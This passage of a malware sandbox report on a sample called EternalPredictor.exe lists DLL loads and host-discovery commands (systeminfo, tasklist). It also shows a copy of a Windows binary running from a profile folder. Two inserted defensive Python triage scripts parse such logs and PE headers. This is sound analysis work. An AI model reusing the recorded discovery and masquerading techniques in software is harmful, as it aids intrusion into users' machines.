                        Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: winsta.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: amsi.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: userenv.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: framedynos.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: sspicli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: msxml6.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: urlmon.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: iertutil.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: srvcli.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: netutils.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: vcruntime140.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: vcruntime140_1.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: amsi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: userenv.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: profapi.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: vbscript.dll
                        Source: C:\Windows\System32\wbem\WMIC.exe    Section loaded: sxs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: edputil.dll
                        Source: C:\Windows\System32\tree.com    Section loaded: ulib.dll
                        Source: C:\Windows\System32\tree.com    Section loaded: fsutilext.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: version.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: mpr.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: framedynos.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: dbghelp.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: srvcli.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: netutils.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: sspicli.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: wbemcomn.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: winsta.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: amsi.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: userenv.dll
                        Source: C:\Windows\System32\tasklist.exe    Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: windowscodecs.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe    Section loaded: ntmarta.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: ifmon.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: mprapi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: rasmontr.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: rasapi32.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: fwpuclnt.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: rasman.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: mfc42u.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: rasman.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: authfwcfg.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: fwpolicyiomgr.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: firewallapi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: dnsapi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: fwbase.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: dhcpcmonitor.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: dot3cfg.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: dot3api.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: onex.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: eappcfg.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: ncrypt.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: eappprxy.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: ntasn1.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: fwcfg.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: hnetmon.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: netshell.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: nlaapi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: netsetupapi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: netiohlp.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: dhcpcsvc.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: winnsi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: nettrace.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: sspicli.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: nshhttp.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: httpapi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: nshipsec.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: userenv.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: activeds.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: polstore.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: winipsec.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: adsldpc.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: nshwfp.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: cabinet.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: p2pnetsh.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: p2p.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: profapi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: cryptbase.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: rpcnsh.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: wcnnetsh.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: wlanapi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: whhelper.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: winhttp.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: wlancfg.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: cryptsp.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: wshelper.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: wevtapi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: mswsock.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: wwancfg.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: wwapi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: wcmapi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: rmclient.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: mobilenetworking.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: peerdistsh.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: slc.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: sppc.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: gpapi.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: ktmw32.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: mprmsg.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: wldp.dll
                        Source: C:\Windows\System32\netsh.exe    Section loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe    Section loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe    Section loaded: powrprof.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe    Section loaded: umpdc.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe    Section loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe    Section loaded: samcli.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe    Section loaded: samlib.dll
                        Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe    Section loaded: netutils.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: cmdext.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: windows.storage.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: wldp.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: uxtheme.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: propsys.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: profapi.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: edputil.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: urlmon.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: iertutil.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: srvcli.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: netutils.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: windows.staterepositoryps.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: sspicli.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: wintypes.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: appresolver.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: bcp47langs.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: slc.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: userenv.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: sppc.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: onecorecommonproxystub.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: onecoreuapcommonproxystub.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: mpr.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: pcacli.dll
                        Source: C:\Windows\System32\cmd.exe    Section loaded: sfc_os.dll
                        Source: C:\Windows\System32\consent.exe    Section loaded: sspicli.dll
                        Source: C:\Windows\System32\consent.exe    Section loaded: samcli.dll
                        Source: C:\Windows\System32\consent.exe    Section loaded: netutils.dll
                        Source: C:\Users\user\Desktop\EternalPredictor.exe    Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
                        Source: C:\Windows\System32\cmd.exe    Process created: C:\Windows\System32\systeminfo.exe systeminfo
                        Source: C:\Windows\System32\cmd.exe    Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST
                        Source: Window Recorder    Window detected: More than 3 window changes detected
                        Source: C:\Users\user\Desktop\EternalPredictor.exe    File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
                        Source: C:\Windows\System32\fodhelper.exe    Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\16.0\Access\Capabilities\UrlAssociations
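The behaviour entries above are the ones an analyst reads by hand: cmd.exe spawning systeminfo and tasklist (host discovery), and a binary named SecurityHealthSystray.exe running from %APPDATA%\Microsoft\Protect and loading samcli.dll/samlib.dll. As an added example, not part of the Joe Sandbox report and not the sample's code, the Python below parses lines in this report's format (it also accepts the fused form the text extraction produced, e.g. "...exeSection loaded: ...") and applies three checks: a well-known system-binary name executing outside the Windows directories, a parent spawning two or more discovery tools, and a process outside the Windows directories loading the SAM client libraries. The allowlists, the discovery-tool set and the sample lines are constructed for the example.

```python
"""Triage of Joe Sandbox-style behaviour lines (added example; not Joe Sandbox code)."""
import ntpath
import re
from collections import defaultdict

# Accepts 'Source: <proc>    Section loaded: <dll>' and the fused '...exeSection loaded: ...' form.
LINE_RE = re.compile(
    r"^Source:\s*(?P<src>.+?)\s*(?P<kind>Process created|Section loaded|Key opened):\s*(?P<rest>.+)$"
)

# Assumed allowlists for the example; extend from your own baseline.
SYSTEM_BINARY_NAMES = {"securityhealthsystray.exe", "svchost.exe", "explorer.exe", "lsass.exe", "csrss.exe"}
TRUSTED_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\", "c:\\windows\\winsxs\\")
# Assumed: host-discovery tools that stealers chain before exfiltration.
DISCOVERY_TOOLS = {"systeminfo.exe", "tasklist.exe", "whoami.exe", "ipconfig.exe", "wmic.exe"}
# SAM client libraries: normal for consent.exe, unusual for a binary in a profile directory.
SAM_CLIENT_DLLS = {"samlib.dll", "samcli.dll"}

# Constructed sample, modelled on entries in this report (one deliberately in the fused form).
SAMPLE_LINES = [
    r"Source: C:\Windows\System32\cmd.exe    Process created: C:\Windows\System32\systeminfo.exe systeminfo",
    r"Source: C:\Windows\System32\cmd.exe    Process created: C:\Windows\System32\tasklist.exe tasklist /FO LIST",
    r"Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exeSection loaded: samcli.dll",
    r"Source: C:\Users\user\AppData\Roaming\Microsoft\Protect\SecurityHealthSystray.exe    Section loaded: samlib.dll",
    r"Source: C:\Windows\System32\consent.exe    Section loaded: samcli.dll",
    r"Source: C:\Windows\System32\netsh.exe    Section loaded: wlanapi.dll",
]


def parse_line(line):
    """Return (source_path, kind, rest) or None for lines that are not behaviour entries."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    return m.group("src").rstrip(), m.group("kind"), m.group("rest").strip()


def in_trusted_dir(path):
    return path.lower().startswith(TRUSTED_DIRS)


def is_masquerade(path):
    """A well-known system binary name running from outside the Windows directories."""
    return ntpath.basename(path).lower() in SYSTEM_BINARY_NAMES and not in_trusted_dir(path)


def triage(lines):
    """Return a de-duplicated list of (tag, detail) findings, in order of first observation."""
    findings, seen = [], set()
    children = defaultdict(set)  # parent image -> child image names it created

    def add(tag, detail):
        if (tag, detail) not in seen:
            seen.add((tag, detail))
            findings.append((tag, detail))

    for line in lines:
        parsed = parse_line(line)
        if parsed is None:
            continue
        src, kind, rest = parsed
        if is_masquerade(src):
            add("masquerade", src)
        if kind == "Process created":
            image = rest.split(" ", 1)[0]  # the image path precedes the command line
            children[src].add(ntpath.basename(image).lower())
        elif kind == "Section loaded" and rest.lower() in SAM_CLIENT_DLLS and not in_trusted_dir(src):
            add("sam-client-outside-windows", src)

    for parent, kids in children.items():
        hits = sorted(kids & DISCOVERY_TOOLS)
        if len(hits) >= 2:
            add("discovery-chain", f"{parent} -> {', '.join(hits)}")
    return findings


if __name__ == "__main__":
    for tag, detail in triage(SAMPLE_LINES):
        print(f"[{tag}] {detail}")
```

The path check is deliberately on the directory, not the name alone: the real SecurityHealthSystray.exe lives under System32 and would not fire, while the copy in %APPDATA%\Microsoft\Protect does. Loading samlib.dll is only an indicator (netapi32 pulls it in for ordinary account queries), which is why it is reported as a separate tag rather than folded into the masquerade verdict.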
                        Source: EternalPredictor.exe    Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                        Source: EternalPredictor.exe    Static PE information: Virtual size of .text is bigger than: 0x100000
                        Source: EternalPredictor.exe    Static file information: File size 18412032 > 1048576
                        Source: EternalPredictor.exe    Static PE information: Raw size of .text is bigger than: 0x100000 < 0x118e800
                        Source: EternalPredictor.exe    Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
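The five static findings above come from the PE headers alone: the COM descriptor data directory marks a .NET assembly, the .text sizes exceed 1 MiB, and the DllCharacteristics word carries the four listed flags. As an added example, not Joe Sandbox's code, the Python below reads those headers directly (no pefile dependency, so the offsets are visible) and reproduces the findings for both PE32 and PE32+. Its input is a header-only PE32+ constructed in build_sample_pe() with the report's values (.text 0x118e800, the four flags); the "large .text in a managed image" heuristic is an assumption added here, not a Joe Sandbox signature.

```python
"""Static PE header triage (added example; not Joe Sandbox code)."""
import struct

IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR = 14
ONE_MIB = 0x100000
DLL_CHARACTERISTICS = {  # subset of IMAGE_DLLCHARACTERISTICS_* relevant to the report
    0x0040: "DYNAMIC_BASE",
    0x0100: "NX_COMPAT",
    0x0400: "NO_SEH",
    0x8000: "TERMINAL_SERVER_AWARE",
}


def parse_pe(data):
    """Parse DOS, COFF and optional headers plus the section table (PE32 and PE32+)."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    coff = e_lfanew + 4
    machine, nsections, _, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    magic = struct.unpack_from("<H", data, opt)[0]
    if magic == 0x20B:                      # PE32+
        nrva_off, dirs_off = opt + 108, opt + 112
    elif magic == 0x10B:                    # PE32
        nrva_off, dirs_off = opt + 92, opt + 96
    else:
        raise ValueError(f"unknown optional header magic 0x{magic:x}")
    dllchar = struct.unpack_from("<H", data, opt + 70)[0]   # same offset in both formats
    nrva = struct.unpack_from("<I", data, nrva_off)[0]
    directories = [struct.unpack_from("<II", data, dirs_off + 8 * i) for i in range(nrva)]
    sections, sect_off = [], opt + opt_size
    for i in range(nsections):
        name, vsize, _va, rawsize = struct.unpack_from("<8sIII", data, sect_off + 40 * i)
        sections.append((name.rstrip(b"\0").decode("ascii", "replace"), vsize, rawsize))
    return {"machine": machine, "dllchar": dllchar, "directories": directories, "sections": sections}


def triage_pe(data, big=ONE_MIB):
    """Reproduce the report's static checks and list which mitigations are set or missing."""
    info = parse_pe(data)
    dirs = info["directories"]
    clr_rva = dirs[IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR][0] if len(dirs) > IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR else 0
    notes = []
    if clr_rva:
        notes.append("CLR header present: managed (.NET) image")
    for name, vsize, rawsize in info["sections"]:
        if vsize > big:
            notes.append(f"virtual size of {name} is bigger than 0x{big:x}: 0x{vsize:x}")
        if rawsize > big:
            notes.append(f"raw size of {name} is bigger than 0x{big:x}: 0x{rawsize:x}")
    flags = [n for bit, n in DLL_CHARACTERISTICS.items() if info["dllchar"] & bit]
    missing = [n for bit, n in DLL_CHARACTERISTICS.items() if not info["dllchar"] & bit]
    # Heuristic (assumption, not a Joe Sandbox rule): IL for a small program is far below 1 MiB,
    # so a managed image with a huge .text usually carries embedded payloads as resources.
    if clr_rva and any(n == ".text" and vs > big for n, vs, _ in info["sections"]):
        notes.append("large .text in a managed image: likely embedded payload/resources")
    return {"dotnet": bool(clr_rva), "flags": flags, "missing": missing, "notes": notes}


def build_sample_pe(is_dotnet, text_size, dllchar):
    """Constructed header-only PE32+ for the example (no code, NOT a runnable executable)."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 0x3A + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    nrva = 16
    opt_size = 112 + 8 * nrva
    coff = struct.pack("<HHIIIHH", 0x8664, 1, 0, 0, 0, opt_size, 0x0022)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x20B)              # PE32+ magic
    struct.pack_into("<H", opt, 70, dllchar)           # DllCharacteristics
    struct.pack_into("<I", opt, 108, nrva)             # NumberOfRvaAndSizes
    if is_dotnet:
        struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR, 0x2008, 0x48)
    text = struct.pack("<8sIIIIIIHHI", b".text", text_size, 0x2000, text_size, 0x200, 0, 0, 0, 0, 0x60000020)
    return dos + b"PE\0\0" + coff + bytes(opt) + text


if __name__ == "__main__":
    # Values mirror the report: .text 0x118e800, DYNAMIC_BASE|NX_COMPAT|NO_SEH|TERMINAL_SERVER_AWARE.
    print(triage_pe(build_sample_pe(True, 0x118E800, 0x0040 | 0x0100 | 0x0400 | 0x8000)))
```

On a real file pass open(path, "rb").read() to triage_pe(). The "missing" list is the interesting output for native droppers; for managed images the C# and VB compilers set all four flags by default, so their presence here says nothing about the author's care, whereas the oversized .text in a .NET PE is what points at an embedded second stage.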
                        Source: Binary string: D:\a\1\b\bin\amd64\unicodedata.pdb source: program.exe, 00000008.00000002.1949490443.00007FFBA4217000.00000040.00000001.01000000.0000001A.sdmp
                        Source: Binary string: D:\a\1\b\libcrypto-3.pdb| source: program.exe, 00000008.00000002.1950555246.00007FFBA65AA000.00000040.00000001.01000000.00000015.sdmp
                        Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: eternal.exe, 00000002.00000002.3236463360.000000001BEE1000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: D:\a\1\b\libssl-3.pdbDD source: program.exe, 00000008.00000002.1950129246.00007FFBA6115000.00000040.00000001.01000000.00000016.sdmp
                        Source: Binary string: 8C:\Users\user\AppData\Local\Temp\3pyiazzo\3pyiazzo.pdb source: powershell.exe, 00000033.00000002.1693664914.000001F880386000.00000004.00000800.00020000.00000000.sdmp
                        Source: Binary string: @ compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG"OpenSSL 3.0.15 3 Sep 20243.0.15built on: Wed Sep 4 15:52:04 2024 UTCplatform: VC-WIN64A-masmOPENSSLDIR: "C:\Program Files\Common Files\SSL"ENGINESDIR: "C:\Program Files\OpenSSL\lib\engines-3"MODULESDIR: "C:\Program Files\OpenSSL\lib\ossl-modules"CPUINFO: N/Anot availableget_and_lock..\s\crypto\ex_data.cossl_crypto_get_ex_new_index_exossl_crypto_new_ex_data_exCRYPTO_dup_ex_dataCRYPTO_set_ex_dataOPENSSL_WIN32_UTF8..\s\crypto\getenv.ccompiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_NO_WARNINGS" -D"NDEBUG";CPUINFO: OPENSSL_ia32cap=0x%llx:0x%llxOPENSSL_ia32cap env:%sos-specificC:\Program Files\Common Files\SSLC:\Program Files\OpenSSL\lib\ossl-modules.dllCPUINFO: ..\s\crypto\init.cOPENSSL_init_cryptoOPENSSL_atexit..\s\crypto\initthread.c..\s\crypto\mem_sec.cassertion failed: (bit & 1) == 0assertion failed: list >= 0 && list < sh.freelist_sizeassertion failed: ((ptr - sh.arena) & ((sh.arena_size >> list) - 1)) == 0assertion failed: bit > 0 && bit < sh.bittable_sizeassertion failed: TESTBIT(table, bit)assertion failed: !TESTBIT(table, bit)assertion failed: WITHIN_FREELIST(list)assertion failed: WITHIN_ARENA(ptr)assertion failed: temp->next == NULL || WITHIN_ARENA(temp->next)assertion failed: (char **)temp->next->p_next == listassertion failed: WITHIN_FREELIST(temp2->p_next) || WITHIN_ARENA(temp2->p_next)assertion failed: size > 0assertion failed: (size & (size - 1)) == 0assertion failed: (minsize & (minsize - 1)) == 0assertion failed: sh.freelist 